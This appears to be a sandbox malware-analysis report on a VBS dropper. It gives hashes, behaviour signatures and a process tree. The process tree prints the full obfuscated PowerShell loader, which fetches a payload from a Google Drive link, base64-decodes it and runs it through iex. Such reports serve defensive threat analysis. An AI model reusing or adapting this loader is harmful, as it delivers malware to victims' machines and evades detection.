Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02-05-2024 06:59

General

  • Target

    20220830_ProtecoPTE..vbs

  • Size

    34KB

  • MD5

    928637e9b64c9425fde7ca14e03aa101

  • SHA1

    337201a455c055b2d79360bfb67ba81dbe64c4b0

  • SHA256

    fbbb12ff0da331f5eba7d3745ba7d2e0184e175176b316c373c461b047f7ba8e

  • SHA512

    5e34714a6b051073222ef2aa8bba45b50ab020bb875ee23057ae91508043badca490542b331c2ca5699f53db283a9399228da4e430fd06b42d3ec20c2fcd4b35

  • SSDEEP

    768:iE/pRPD/VQHfE5kAZ6/PEAJPPvv/P4WNHeCSwFbwv21ov3dT8IcXRQ/Ua9Sr1TjT:iupRPD/yHfakAZ6/PEAJPPX/P4WVeCSm

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request (3 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (4 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20220830_ProtecoPTE..vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:344
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Harebur = 1;$Buffo230='S';$Buffo230+='ubstrin';$Buffo230+='g';Function Drottens190($Unthwarting){$Readvertizing=$Unthwarting.Length-$Harebur;For($Marianolatrist234=5; $Marianolatrist234 -lt $Readvertizing; $Marianolatrist234+=(6)){$Erantisers30+=$Unthwarting.$Buffo230.Invoke($Marianolatrist234, $Harebur);}$Erantisers30;}function direktricens($Besparede){& ($Lovligt) ($Besparede);}$nodebladenes=Drottens190 'IngleMunimaoPedalzespeiiForswlMischlna miaTo.si/Istem5Toldf.Loeft0O,ers Hover(pussyW UdspipalaenChitcdKim eoImucawSkibss Ante MacrNc imoT Tria Freds1A.dam0Swelp.Ca.em0Ine t;H ote JuteWOmspnidetacnOverr6 Afgo4Mokke;Styrt Plebix De.a6Ombru4Melle;Labor trowrKlattv B bl:Bispe1Bek.f2Unre 1 Calc.silk.0Unris)Trous krltoGConteeF.lkecgummakOverfovm el/O,blu2Listr0Rhyth1Komme0 Subf0Uhel.1 Unpr0Rrl n1,dfor Opf,gFRe.skiDia.yrEncloeHermefNav,soB,spox Kild/R.dis1mora 2Otto 1lager.Hemi.0Autho ';$Specialprventionerne=Drottens190 'VidetUGravesTeleteSrge,r Drif-MesioAKon,egI,dvieRosa nBingotJudi ';$Bordkortet=Drottens190 'He.lihVigent Ha et calpS,ndasKnage:Re,sl/Slav./ ,roddLndstrUropoiforl vDaimyePirat. EstigAmphioTreleo Kl.rgT.tchlO tbre Dorm.Su ercIndgaoAfmrkmEndo /Windbuanticc Efte?A,mode,rritxBiblipSmreroHairhrToec,tHgene=tn,ebd MaadoPoli wAsylonSpildlDesseoBfsbiaSortedCourg&.ammeiPestedOff.c=Godb.1SpunsZ.aydri euxaw VigtwAntikEHieroW I.frTRe,ism maalCSlvskWInter_Slavolm.ntaRNicolW B,lamGenomnTjenel doptvPaask_UdligHAspirJ foraUSa,an8PrudeYOppu,-Dayfl0rese oRkkefE,houlU Afg.lbol.e4lemlsdCh.mo ';$Kontingenteringernes=Drottens190 'Slagi>.oney ';$Lovligt=Drottens190 'Ov.raiLigeve SknsxFjern ';$Valutamarkedets='Lingvistens';direktricens (Drottens190 ' KredS Ng.ee Ultrt Ma.n-,tocaCOmnivo .ndenKlovntAltngeMur,nnAfrust Sond Spare-VideoP urra Resutunst,hTyndb Gi.syTPo.td:Tuata\N.ncuSRyg,aebustel h alvRivale,siltjliebeeE hemt Flets Schc.Bil.etAnalyxBeg,utUn er Bed.-SeekiV orfaa ProllSupe uHv,rveD rke ,emat$ quodVAn.imaForfrlBeskfu Holst SubsaProklm odeaas,urrLgelikOrchieRystndE,fure Pre,t A fesOutkn;Aco.o ');direktricens (Drottens190 ' TrstiDiamaf A od borat(T feltKnalleLott.sDrifttPoind-K nflpbook aPaleotKvasehAn,ic ThrusTTena,:Knipl\ggestSUforme.orphlMannov Molme JungjRec neEstu,tFol,esVenst. Doolt .njoxCatactFasta)Dulli{grnseeFngsexdestaiSteentdepos} Tatt;Winte ');$Blufferen = Drottens190 'FrarvenonadcGalinhvagtso Afsp ,ircu%Si keaMetacpSka.tpF gbedTransaZo,sptBondeaMod s%Al sk\ Dr vBOmforrAfl.deDuopoaParensd alotOpdrtwFr daeSolideR.diodEnvia.Kasu,QGraecuProceiDomme Aadri&oedem&Disin SkraaeafskycSagsghGrundoMo bi Utjsv$ Phth ';direktricens (Drottens190 ' Reno$ Ud,kgOpklol Ca.eoVrangbN klgaAbsorlDecap: ,ranKvrissvT.ileidyse,vGlossaAfs,vlTilsteAm,norSiliki overn.einfgSy iseGrundrRegiosOks,b=Diet,( ingmcKammemKategdSubch Trema/Afterc Sko Tilfl$Mir gBBotanlCitrousubsaf PredfHankae CornrvagtheTrillnC.tba)Mukke ');direktricens (Drottens190 ' Pant$Hy,osgEndoklTvivlo FredbCeleba AndelK.ndi:ProetI .olpnAnalod v deiMoerksFeltit S.ldiRhizonBejaegDonleuEpitoi Hares cierhEmissa .isdbOliebl.udsleBreadnHydr.eJordbsDoksasPatro=Polit$KultuB ForkoL.nierIn,erdRundvk,inisoCinnarJocketudjo eReceptBesto.AndensCroonpEcophl L.rsiE cultFemin( Dias$KluntKMascuo Top,n nsoptHeldiiDr,ugn Hikkg DepreLandfn ,echt Chi,eHemadr StyriRomannBehavgIngraeOmadrr Pel.nHindreRapidsAtror) Extu ');$Bordkortet=$Indistinguishableness[0];direktricens (Drottens190 ' .und$PhysigS livlfri,to .ilgbValena arlsl Mili:UndocF C.rdoApoutrspatimOmno,y.eratl F,le=BejelNRebuieHyperwHuara- FlyvO,rdokb In,ojFodboeEpulacLer atUafhn DisabS,alvay HalvsMarketFrit,eStresmGeogr.AuditN ekspeprecltW.rkb.AccruWStdpue SticbMonopCChieflP.nnoiPir.feAnadyn T,gnt Afkl ');direktricens (Drottens190 'ophio$KultuFB ghaoDepilr He.amTawhiy TranlDiate.TraadHChefre Brn,aEmbandUnstieUopnarOverbsDumpi[skumr$ TilhSReturpAns,te.hatocIn rai PriaaKapitlZombipBlaagr N igv rlseeHypern ApattTa,lei Felto DekanCrackeParabrquercnSubpreMidde]Cupca=Nedri$Symphnmon.mo,fbjed trgneS,resbColorlNitroaAfdredTilsteBrahmn GraveArve.sSa,li ');$Perlevennens=Drottens190 'TiderF.olleoUnpatrSlummmCopepy Svedlbruds.SalteDUstaboEnekawUngnanAfholl.agouoAntelaHost,dV.rvaF t aniForpal Sag.e,horo(Unslo$SitutB.ueino OxidrUncomdSkolek ygraoKom rrProsotintere.ncoltMajor,Chess$Simild UnbuiTrstulForeilUltraeP.eudn SalgiDeme,aUndvi)Konde ';$Perlevennens=$Kvivaleringers[1]+$Perlevennens;$dillenia=$Kvivaleringers[0];direktricens (Drottens190 'Lepid$ UlcegVandslFladvoT,ktabUdreda TalllMeth :Sus.rOGlacin Un rdSelefuEmboslUnadmeArnotrgungeeP.ahnnPetitdSammeeTvrve= Strm( Gr,nTpredreIberesPre eten.ob-MultiPPres axantht Wafth u,go Asp,r$D resdArctiiUdbrnl ajpllDe moeDolomnRusgiiRatioaPreun)Dynam ');while (!$Ondulerende) {direktricens (Drottens190 'Euoua$ TikagA istl Gleno sphebBityiaCharelovert:KegleDE.eceoAnimimTacklsSundep.rritrTorpoa OverkTrichs KrusiVidersForsysK.ffee altssShant=W,nni$BrstetForeprYngleuhedgeeRekni ') ;direktricens $Perlevennens;direktricens (Drottens190 'AppenSRifletpantnaTaarnrSideotannam-FundaS acklHotele Fi ae.umpepC nvi T.dji4Dorte ');direktricens (Drottens190 'Henre$Cotregarr,elBortvo EftebSkovla Reesl Pa,l:PubliObiop nMelandTinamuSqu.dlWarisePlo srClyteeEntanncognidWoo,yenumme= lnne( TattTArkiteSu rasVa antSp,ci-suk ePJobbia Pro,tTraadhUrusp ,astu$E,obrdMukkeiRodekl hobbl,idteeGranknExauniCon,iaPlie.)Goldh ') ;direktricens (Drottens190 'Sangr$,uddegSiglolUnlitoResbebKirkeaAirh,l ants:Sauv,DExpedeImidecAndeneAabenrC.austFors,iMarkefCl,ggyComfii AcetnU.harg.dvik=Esthe$BistrgSgmlslBrodso,kinhb Drmaa ,nselI tra:QuiddNChefrePliredVidenfAsystrFrytleBretenHemogdamfi eBernes afst+Omarb+Cario%Ge.ne$MdedeIVolubnPateldGir.kiN ndesFloretstar iDystrnReunigManomuAblueiUdlggs SlothhjemsaAntirbCoronlParsleSygeknOverfe Bortsd.talsDem.n.OmbrycEskado SpeauPhiesnsavagt Yvor ') ;$Bordkortet=$Indistinguishableness[$Decertifying];}direktricens (Drottens190 ' Forr$Ada tgKnurllnongroChilob Sk,laRrligl.aale:Unr.fESupernMulade Mu,iwPapul Seqrc= Prop BdepGHeilee Sigbtgar e-BortoC orneo UdtrnRe,netMooraeTypebnbeglotSulfu Outla$C mmodFremkiPrimrl Mis,lSikkeeus.renfin,aiCitriaSkatt ');direktricens (Drottens190 ' Vej,$ EvadgLngt lKondeoKl gebTheolaTrykllHerma:j.venVPolara Pe tlFremsuSlummeG.iff Ka,ku= Sche Udskr[SogneSAand y RemasKrs,ltQua reUdkasm Cera.vae eCGenbro Und nOpbe.v ,elseTrombrBrinetTitra]stift:Genne:HjemlFTrevlrStiknoRapgrmSkuesBKappeaT rrasTiltvePokya6 Fodb4SkrueSSkrmftP.stmrBehagiScav.nInveigSport(Prol $PartyEUmaadnIgnoreIndhowWinne) Coel ');direktricens (Drottens190 'trrep$Prydsg TilblBorgeoLiljeb.acroaBurgulGenke:.luggPboom.r.orgeeSterirAabeneRetreqBndeluFor tiBesgssfrilai InkotClinieSogne Photo=Phot, Kon,t[DiagnSZoospyBiog,s.ugtutrinkneAnkremFortr.Rema TIberieHemm,x disitAbrea.KortbESnftenP acoc Hj,moPegvod AwneiSgeomnKonomgSpont]Inton: can:ExcerAJrnamS Cre,CTacksIPeerlIMusik.AntibGKol.eeShib tKdebrSTeksttTh.ocrSa.seiTilorn,ilmcgMulti( De i$DeediVPi liaLimfalAbevauH.rvae ilst) over ');direktricens (Drottens190 ' Atla$ SandgForunlHenvioInsnabAn,toanyasclSp.un:UnminTBlazeaSacroemo.erlF,ues=gu,mi$ ByplPUnsavrMudgueRenser Diare DemoqBar,ouTil.ai estis KultiBand,tAmbroeAnthr..harms.uphruStackbSammesPebertJagthrBere iUberenNefengChaly(Depre3 Nond2Strit0 Proc6 Cai 8Conc.7archa, Nrkl2 Tram7Slisk7Indfl5Grubr3Gr yh),enum ');direktricens $Tael;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4792
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Breastweed.Qui && echo $"
        3⤵
          PID:1904

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1trkdvi5.pxc.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4792-2-0x00007FFB9CBD3000-0x00007FFB9CBD5000-memory.dmp

      Filesize

      8KB

    • memory/4792-12-0x000002C385FB0000-0x000002C385FD2000-memory.dmp

      Filesize

      136KB

    • memory/4792-13-0x00007FFB9CBD0000-0x00007FFB9D691000-memory.dmp

      Filesize

      10.8MB

    • memory/4792-14-0x00007FFB9CBD0000-0x00007FFB9D691000-memory.dmp

      Filesize

      10.8MB

    • memory/4792-15-0x00007FFB9CBD0000-0x00007FFB9D691000-memory.dmp

      Filesize

      10.8MB

    • memory/4792-20-0x00007FFB9CBD0000-0x00007FFB9D691000-memory.dmp

      Filesize

      10.8MB